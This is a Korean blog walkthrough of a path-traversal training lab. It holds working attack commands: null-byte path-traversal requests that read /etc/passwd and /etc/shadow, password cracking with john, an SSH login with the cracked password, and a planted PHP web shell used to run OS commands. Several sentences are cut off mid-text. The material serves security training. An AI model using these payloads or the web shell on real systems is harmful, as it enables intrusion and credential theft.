홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 WH-PathTrav-01 경로조작 웹해킹훈련장 실습 설명서
WH-PathTrav-01 훈련장 환경 구성다음 ISO 파일을 다운로드 받아서 주인 운영체제 내의 적당한 위치에 저장한다.
VMWare Workstation Player를 이용하여 가상머신의 손님 운영체제로 라이브 ISO를 부팅한다.
손님 OS의 메모리 용량은 512MB 이상이면 된다.
부팅이 끝나면 또다른 가상머신인 Kali Linux에서 root@kali:~# ifconfig eth0: flags=4163
위와 같이 칼리리눅스와 동일한 C-클래스 대역을 스캔하면
위의 그림은
칼리 리눅스에서 nmap 스캔 결과root@kali:~# nmap -A 192.168.206.137 Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-16 10:12 KST Nmap scan report for 192.168.206.137 Host is up (0.00028s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh Dropbear sshd 2011.54 (protocol 2.0) | ssh-hostkey: | 1024 20:41:f9:78:e9:16:c4:e6:de:89:67:a8:57:23:48:bc (DSA) |_ 1039 f4:2f:9a:a0:6d:cc:b3:2d:64:88:0d:99:8e:96:71:70 (RSA) 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: \xEC\x9D\xB4\xEB\xAF\xB8\xEC\xA7\x80 \xEC\xB0\xBD\xEA\xB3\xA0 ::: \xEC\x9B\xB9\xED\x95\xB4\xED\x82\xB9/\xEC\x9B\xB9\xEC\xB7\xA8\xEC\x95\xBD\xEC\xA0\x90\xEB\xB6\x84\xEC\x84\x9D MAC Address: 00:0C:29:AD:C0:D8 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.36 - 2.6.37 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.206.137 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.39 seconds root@kali:~#
nikto 스캔 결과root@kali:~# nikto -host 192.168.206.137 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.206.137 + Target Hostname: 192.168.206.137 + Target Port: 80 + Start Time: 2017-01-16 10:13:37 (GMT9) --------------------------------------------------------------------------- + Server: Apache + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 7535 requests: 0 error(s) and 1 item(s) reported on remote host + End Time: 2017-01-16 10:13:45 (GMT9) (8 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
OWASP-ZAP 점검 결과
수동점검홈페이지에서 제공하는 모든 URL을 보면
등이 발견된다.
사용자가 이미지를 업로드할 수 있으며(
JSP 웹쉘에 "
<img width="150" src="download.jsp?id=6d46780764400b520a838f3b7adc4411"> 이다. 이 이미지를 firefox로 직접 연결하면 firefox http://192.168.206.137/download.jsp?id=6d46780764400b520a838f3b7adc4411
파일을 "
확장자 처리에 대해서 살펴보기 위해 http://192.168.206.137/download.jsp?id=7c15e4ae99dca253a6ec02c765ba698e 에서 다운로드받을 수 있다. 이 URL의 HTTP 헤더를 살펴보자. root@kali:~# curl -I http://192.168.206.137/download.jsp?id=7c15e4ae99dca253a6ec02c765ba698e HTTP/1.1 200 OK Date: Mon, 16 Jan 2017 13:21:16 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff Pragma: public Expires: 0 Content-Disposition: attachment; filename="7c15e4ae99dca253a6ec02c765ba698e.jpg" Content-Transfer-Encoding: binary Content-Length: 29350 Content-Type: application/octet-stream root@kali:~#
서버가 전달하는 파일이름은 소문자
다양한 확장자를 가지는 파일을 업로드하였으나, 대소문자를 구분하지 않고 확장자가
사진설명과 원본 파일 이름이 홈페이지에 출력되기 때문에 HTML을 입력하였으나
작은 부등호(
위의 화면은 HTML 삽입을 시험한 결과이다. 부등호와 스크립트가 실행되지 않고 화면에만 출력되는 것을 볼 수 있다. HTML삽입 취약점이 존재하지 않는다.
이제 파일 내려받기 기능( root@kali:~# curl -I http://192.168.206.137/download.jsp?id=%27 HTTP/1.1 200 OK Date: Mon, 16 Jan 2017 10:26:34 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff Pragma: public Expires: 0 Content-Disposition: attachment; filename="'.jpg" Content-Transfer-Encoding: binary Content-Type: application/octet-stream root@kali:~#
위에서는
파일 다운로드 기능에서 주로 취약점이 발생하는 이유는 사용자의 입력값을 접근할 파일의 경로 구성에
사용할 때이다.
만약
널문자삽입(Null-byte Injection)이 발생하면 공격자가 원하는 지점에서 문자열의 끝을 지정할 수 있다.
이는 거의 모든 프로그래밍 언어에서 문자열의 끝을
Null-byte Injection이 가능한 지 살펴보자.
root@kali:~# curl -I http://192.168.206.137/download.jsp?id=test%00test HTTP/1.1 200 OK Date: Mon, 16 Jan 2017 16:25:22 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff Pragma: public Expires: 0 Content-Disposition: attachment; filename="test Content-Transfer-Encoding: binary Content-Type: application/octet-stream root@kali:~#
정상적인 반응이라면 서버에서
리눅스/유닉스 계열의 서버에서 경로조작 취약점을 점검할 때는 충분한 root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/passwd%00 root:x:0:0:Root Administrator:/root:/bin/sh nobody:x:99:99:Unprivileged User:/dev/null:/bin/false www:x:80:80:Web Server User:/var/www:/bin/false tux:x:1000:1000:Linux User,,,:/home/tux:/bin/sh mysql:x:100:101:Linux User,,,:/home/mysql:/bin/false webmaster:x:1001:1001:Linux User,,,:/home/webmaster:/bin/sh root@kali:~#
리눅스 운영체제에서 계정 정보를 저장하는 파일은 root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/shadow%00 root:$1$AWZJh37l$LuiYbuFM1KSFTk.s0BawD/:17186:0:99999:7::: nobody:*:13509:0:99999:7::: www:*:13509:0:99999:7::: tux:$1$DoeNhd4i$KsGdikH.BeAXC.DVzvKc71:17186:0:99999:7::: mysql:!:17135:0:99999:7::: webmaster:$1$DP9ynR4O$N/NZSK2w7UT.cCFl3sv8X0:17186:0:99999:7::: root@kali:~#
root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/shadow%00 -o etc-shadow % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 261 100 261 0 0 110k 0 --:--:-- --:--:-- --:--:-- 254k root@kali:~# time john etc-shadow Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5" Use the "--format=aix-smd5" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3]) Press 'q' or Ctrl-C to abort, almost any other key for status iloveyou (webmaster) 1g 0:00:51:09 3/3 0.000325g/s 24041p/s 48079c/s 48079C/s aybjbg..aybjmb 1g 0:02:26:23 3/3 0.000113g/s 24162p/s 48324c/s 48324C/s mani155..mani182 1g 0:04:34:42 3/3 0.000060g/s 23768p/s 47535c/s 47535C/s r1j1jf..r1j1tj ^c 1g 0:06:17:01 3/3 0.000044g/s 23792p/s 47584c/s 47584C/s pp1i$21..pp1i$2u Use the "--show" option to display all of the cracked passwords reliably Session aborted real 377m1.924s user 374m43.868s sys 0m18.536s root@kali:~#
위에서는 WH-PathTrav-01 훈련장의
root@kali:~# ssh webmaster@192.168.206.137 The authenticity of host '192.168.206.137 (192.168.206.137)' can't be established. RSA key fingerprint is SHA256:CUew8TTFK52RQcHnSBjXaOXH7lLGe6wO/WUkn1Svauw. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.206.137' (RSA) to the list of known hosts. Secure login on SliTaz GNU/Linux powered by Dropbear SSH server. webmaster@192.168.206.137's password: iloveyou[Enter] Welcome to the Open Source World! SliTaz GNU/Linux is distributed in the hope that it will be useful, but with ABSOLUTELY NO WARRANTY. webmaster@slitaz:~$ ls arsenal/ public_html/ webmaster@slitaz:~$ cd public_html/ webmaster@slitaz:~/public_html$ ls download.jsp files/ index.jsp style.css upload.jsp webmaster@slitaz:~/public_html$ cat download.jsp <?php $filepath = 'files/'.$_GET['id'].'.jpg'; $filesize = filesize($filepath); header("Pragma: public"); header("Expires: 0"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"".$_GET['id'].".jpg\""); header("Content-Transfer-Encoding: binary"); header("Content-Length: $filesize"); ob_clean(); flush(); readfile($filepath); ?> webmaster@slitaz:~/public_html$ cat "<?php system(\$_GET['cmd'])?>" > cmd.jsp webmaster@slitaz:~/public_html$ cat cmd.jsp <?php system($_GET['cmd'])?> webmaster@slitaz:~/public_html$ exit Connection to 192.168.206.137 closed. root@kali:~#
위에서는 칼리리눅스에서 훈련장으로 SSH를 통해 이 취약점이 발견된 실제 서비스에서는 SSH가 외부에서는 접속이 불가능하였다. 방화벽에 의해서 막혀있는 상태였다. 그런데 출입구의 고객응접실에 WIFI가 제공되고 있었다. 이 WIFI는 기관 내부 PC와 동일한 대역의 IP주소를 NAT 주소로 사용하고 있었다. 휴게실에서 스마트폰의 터미널로 해당 웹서버에 접속할 수 있었으며, 위와 같은 작업을 진행할 수 있었다.
웹 서버에 실제 이 취약점이 발견된 웹 서비스는 Apache Tomcat 기반의 서비스였다. 이 훈련장은 Apache 웹 서버로 재구성하여 실제로는 PHP 기반의 서비스여서 웹쉘은 PHP 코드를 사용한다.
칼리리눅스의 root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=pwd /home/webmaster/public_html root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=uname+-a Linux slitaz 2.6.37-slitaz #2 SMP Wed Mar 7 10:36:39 CET 2012 i686 GNU/Linux root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=id uid=80(www) gid=0(root) groups=0(root) root@kali:~#
운영체제 명령어가 실행되는 것을 볼 수 있다.
리눅스의
이 취약점이 실제로 발견된 서버는 Apache + Apache Tomcat의 서비스 환경을 가지고 있었다.
Apache 웹서버는
웹서버나 WAS 서버가 [처음 작성한 날: 2017.01.16] [마지막으로 고친 날: 2017.01.16] < 이전 글 : 오늘의 웹서버 공격 로그: 워드프레스 취약점 자동탐색 도구 (2017.01.18) > 다음 글 : WH-Webshell-Loc-01 라이브 ISO: 서버 내 웹쉘 저장경로 알아내기 (2017.01.14) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |